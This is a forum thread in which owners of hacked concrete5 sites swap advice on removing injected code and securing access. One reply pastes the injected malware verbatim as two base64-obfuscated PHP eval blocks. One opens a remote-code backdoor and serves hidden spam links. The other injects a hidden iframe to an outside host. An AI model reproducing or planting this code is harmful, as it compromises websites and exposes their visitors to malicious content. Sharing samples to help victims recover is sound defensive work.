Someone hacking into index.php

Permalink 1 user found helpful
I have a site that keeps getting corrupted with a javascript that is obviously getting placed by a hacker.

The database password has been changed and the password to the server has been changed. I am contacting the web host to help resolve the issue as well.

I am wondering if anyone else has run across this issue and how you resolved it.

FatTony1952
View Replies:
nteaviation replied on at Permalink Reply
nteaviation
We had someone hack our index.php and insert some php code. It appears it is a javascript redirect ploy. It did not work (HaHa) and was easy enough to fix.
<?php 
require('concrete/dispatcher.php');<?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwppZigkX1JFUVVFU1RbJ2RmcXczMWYnXSkKZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsnZGZxdzMxZiddKSk7CiRocmVmID0gJ2h0dHA6Ly93d3cucHJvc29mdHdhcmVzdG9yZS5jb20vJzsKJHdvcmRzID0gYXJyYXkoJ1NvZnR3YXJlIFN0b3JlJywgJ01pY3Jvc29mdCBTb2Z0d2FyZScsICdBZG9iZSBTb2Z0d2FyZScsICdBdXRvZGVzayBTb2Z0d2FyZScsICdCb3JsYW5kIFNvZnR3YXJlIHNob3AnLCAnVk13YXJlIFNvZnR3YXJlJywgJ1Nob3AgU29mdHdhcmUnLCAnTUFDIFNvZnR3YXJlJywgJ1dpbmRvd3MgU29mdHdhcmUnLCAnU3ltYW50ZWMgc2hvcCcpOwoka2V5bnVtID0gY291bnQoJHdvcmRzKTsKJGFsdHMgPSAkd29yZHM7CgokciA9IHJhbmQoMCwgMyk7CiRyMiA9IHJhbmQoNCwgNyk7CiRyMyA9IHJhbmQoOCwgJGtleW51bS0xKTsKc2h1ZmZsZSgkYWx0cyk7CmZvcigkaT0wOyAkaTwka2V5bnVtOyAkaSsrKQp7CmlmKCRpPT0kciB8fCAkaT09JHIyIHx8ICRpPT0kcjMpCnsKJHI0ID0gcmFuZCgxLCAzKTsKJHN0ciA9IGltcGxvZGUoIiAiLCBhcnJheV9zbGljZSgkd29yZHMsIDAsIHJhbmQoMSwgaW50dmFsKCRrZXludW0vMikrMSkpKTsKJGFsdHNbJGldID0gIjxoND48YSBocmVmPVwiJGhyZWZcIiBhbHQ9XCIkc3RyXCIgdGl0bGU9XCIkc3RyXCI+U2hvcCAiLiRhbHRzWyRpXS4iPC9hPjwvaDQ+IjsKfQp9CmFycmF5X3B1c2goJGFsdHMsICI8YSBocmVmPVwiJGhyZWZcIj4kaHJlZjwvYT4iKTsKc2h1ZmZsZSgkYWx0cyk7CiRzdHIgPSBpbXBsb2RlKCIgIiwgJGFsdHMpOwppZihwcmVnX21hdGNoKCIvKGNyYXdsKXwoZ29vZ2xlKXwoeWFob28pfChiaW5nKXwoc3B5KXwoYm90KXwocGVybCl8KHB5dGhvbil8KGhvbG1lcyl8KGFsZXhhKXwoYi1vLXQpfChmaW5kbGlua3MpfChpY2hpcm8pfChsYXJiaW4pfChsaW5rKXwobHdwKXwoUHljVVJMKXwoc2NydWJieSl8KHNlYXJjaCl8KHN0YWNrKXwodXBkYXRlZCkvaSIsICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSkpCmVjaG8oIjxkaXYgYWxpZ249Y2VudGVyPiRzdHI8L2Rpdj4iKTsKZWxzZQplY2hvKCI8Zm9udCBzdHlsZT1cInBvc2l0aW9uOi8qKi9hYnNvbHV0ZTtvdmVyZmxvdzovKiovaGlkZGVuOy8qKi93aWR0aDovKiovMFwiPiRzdHI8YSBocmVmPSckaHJlZic+JGhyZWY8L2E+PC9mb250PiIpOw==")); ?>
<?php eval(base64_decode("aWYocHJlZ19tYXRjaCgiL3J1L2kiLCRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddKSkNCgkJZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9hZGhlc2l2ZXN0cmVuZ3RoLmluL2luLmNnaT8xODQiIGZyYW1lYm9yZGVyPSIwIiB3aWR0aD0iMyIgaGVpZ2h0PSIzIiBzdHlsZT0idmlzaWJpbGl0eTogaGlkZGVuOyI+PC9pZnJhbWU+Jzs=")); ?>
FatTony1952 replied on at Permalink Reply
FatTony1952
Yeah, it was an easy fix, just frustrating though. I found the script in the index.php, dispatcher.php and both files in the config folder.
nteaviation replied on at Permalink Reply
nteaviation
Changing the account password took care of it. Not sure how they got in, our password was fairly secure. Now it's REAL secure :)
albinbuilt replied on at Permalink Reply
I just discovered that my index.php file was hacked (I have not checked the other files mentioned). I see that you mentioned the fix was easy. What was the fix for the file? Is there a repair option within C5 or did you manually repair the file/s? I am looking for a backup of the file, but I am not sure if I backed it up. Fixing the file is only a patch seeing the hacker could do it again. when this type hack happens, is the hacker typically getting in through the Database, the Concrete5 login, an FTP account login, or the cpanel login?
I could change all my passwords, but I feel there were several that were already close to bullet proof passwords (I say close to bullet proof, because I am guessing that all passwords can be hacked.... if the hacker has the time to keep trying.)

Thanks for any help you can give.

Albin
Mnkras replied on at Permalink Reply
Mnkras
in the index.php you just need

<?php 
require('concrete/dispatcher.php');
albinbuilt replied on at Permalink Reply
Mnkras, Thanks for the info. I renamed the bad index.php file to indextrashed.php and then replaced it with an index.php file with just the code you mentioned, and it worked like a charm.

Now I need to plug up the holes in the site access.

Thanks again

Albin
spw2000 replied on at Permalink Reply
Had a similar problem with OsCommerce - same hack method - found a (community) developer who is GREAT and very generous with his time - he created osc_sec.php which is included in the OSCommerce equivalent of dispatcher.php and detects, alerts and foils attacks - very impressive - I am sure he can come up with somnething for C5 too: try Rangi ([email protected]) - tell him the reference was from the OSCommerce guy from Fansonline :)
nteaviation replied on at Permalink Reply
nteaviation
In our case they located every index file (index.php/index.html... etc) and inserted the base64 javascript code on the end of the file. If you see any php like "eval(base64_decode" nuke it. I suspect it was done via ftp so none of the Concrete5 Passwords were compromised, only our web host's account password. Hope it helps :)
albinbuilt replied on at Permalink Reply
I will look around for any php files that have the content you mentioned, and I am going to clean up all my unneeded ftp accounts and strengthen all the other passwords.

Thanks for your help.

Albin
Justifi replied on at Permalink Reply
Hey guys,

I know this is an old thread, but I'm experiencing this problem for the first time and pretty new (completely new) to programming, web management, so thanks for the help!

I've been able to go in and find the index.php and the dispatcher.php file and remove the code manually, but it looks like the [eval(debug] code is in EVERY ONE of the php files on my site.

How do I mass-remove this code? Is there a quick fix that I won't mess up or are we best off trying to hire someone to fix this? What's our best option?

Thanks a bunch,

Steve
albinbuilt replied on at Permalink Reply
Sorry to hear about your site.

If you have that many files that are corrupt I would think it would be best to restore from a recent back up. Does your host do automatic backups?

The next is just a brain storm idea and someone might come in and tell you this is a bad idea because certain files site specific settings (mysql settings, passwords, concrete5 community connections, info about the addons you have installed...) Another option is to install a second copy but same version of concrete5 in a sub-domain (sub-folder), then copy over the php files. Maybe someone can tell you what php files you should not copy over and need special attention.

Albin
albinbuilt replied on at Permalink Reply
I did a search for "eval(base64_decode" in all php files, and came up empty. So currently it looks like the index.php file is the only file that was changed.
nteaviation replied on at Permalink Reply
nteaviation
I am sure there are many variant's of this hack. Here is some info:
http://hubpages.com/hub/How-To-Remove-The-evalbase64_decode-Virus...

There is also a way to decode the encoded data to see what it was trying to do. Google around for that :) As I mentioned above, ours decoded into a javascript redirection ploy to a malicious site.
HOBOcs replied on at Permalink Reply
HOBOcs
Looks like I have a hacked website as well with all .PHP files containing a "eval(base64_decode" prefix.

I've done a check of the php files and index.php is infected, and it appears that all the php files contain this "header" insertion.
I'm not sure my hoster has a recent back up and if not then I suspect I have to do a lot of editing on all the .php files

Any suggestions on a better solution. (I know, backups, backups)